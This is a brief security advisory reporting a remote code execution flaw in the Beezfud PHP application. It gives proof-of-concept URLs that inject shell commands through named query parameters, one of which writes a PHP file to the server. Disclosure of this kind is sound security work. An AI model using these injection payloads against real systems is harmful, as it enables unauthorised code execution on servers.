Beezfud suffers from a remote code execution vulnerability.
497a4606c5bb1310751ac087938088185c27e036193143a5a7f63aea7b2a8d8f
================================================================================
# Beezfud Remote Code Execution
================================================================================
# Vendor Homepage: https://github.com/EVA-01/beezfud
# Date: 23/12/2015
# Software Link: https://github.com/EVA-01/beezfud/archive/master.zip
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/beezfud-exec.txt
================================================================================
# Vulnerable File : index.php
# PoC :
http://localhost/beezfud/index.php?parameter=;Command;
Vulnerable Parameters : lookback , max , range , latest , earliest
Example :
http://localhost/beezfud/index.php?lookback=;echo '<?php phpinfo();
?>' >info.php;
================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================